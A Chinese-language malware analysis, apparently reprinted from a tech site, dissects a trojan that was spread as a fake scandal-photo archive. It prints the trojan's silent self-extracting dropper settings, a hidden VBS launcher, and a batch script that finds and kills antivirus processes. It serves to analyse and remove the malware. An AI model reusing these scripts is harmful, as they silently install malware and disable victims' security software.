内容摘要:最近,“艳照门”闹得沸沸扬扬,朋友猎奇,不幸中招。笔者帮其恢复系统,询问了中马经过,下面搭建测试环境还原过程,并对该木马进行分析与清除。
Path=%systemroot%
Setup=ymz.exe
Presetup=艳门照.rar
Silent=1
Overwrite=1
解释如下:
第一行是文件的解压路径,在系统根目录下;
第二页是解压后自动运行ymz.exe;
第三行是在解压之前先解压艳门照.rar,达到掩人耳目,看不到ymz.exe文件,其实它已经运行了;
第四行是隐藏文件,达到更隐蔽;
第五行是覆盖目录下的同名文件,以容错更可靠。
用同样的方法在WinRAR中解压ymz.exe,发现下面5个文件:(图5)
1.bat
1.exe
1.vbs
knlps.exe
knlps.sys
同样在右边有自解压脚本代码:
Path=%systemroot% emp
SavePath
Setup=1.vbs
Silent=1
Overwrite=1
原理好上面的一样,只不过是解压到系统临时目录下。
用记事本打开1.vbs分析,代码如下:
CreateObject("WScript.Shell").Run"cmd/c1.bat",0
很明显,是调用1.bat文件。
用记事本打开1.bat文件,代码及其解释如下:
@ECHOOFF
knlps.exe-l>PID.txt
FINDSTR/i"RavMon.exe"PID.TXT>>RAV.txt
FINDSTR/i"RavMonD.exe"PID.TXT>>RAV.txt
FINDSTR/i"CCenter.exe"PID.TXT>>RAV.txt
FOR/F"eol=;tokens=1delims="%%1in(RAV.txt)doknlps.exe-k%%1
来源:豆豆网转载 作者:IT专家网 责编:豆豆技术应用
- 金山毒霸 2009 杀毒套装 下载 免费 试用
- 金山毒霸 9 互联网安全套装下载
- 巧用“记事本”程序让病毒白白运行
- qq盗号木马变种Trojan-PSW.Win32.QQPass.kht
- jsnndya.exe,gozowzeuisnxd.exe,dkzuimwvx.exe等的清除
- Trojan.DL.Win32.Mnless.ahy(DODOLOOK139.EXE)分析查杀
- Adware.Win32.Agent.nys(mfjdkhk.sys)查杀
- cag1ynw1.com,d32dx9.sys等恶意文件删除解决方案
- wgsfun.dll,456320.exe等cnbeta恶意木马清除解决方案
- ssrcservice.exe,ssrcservice.dll等恶意病毒清除解决方案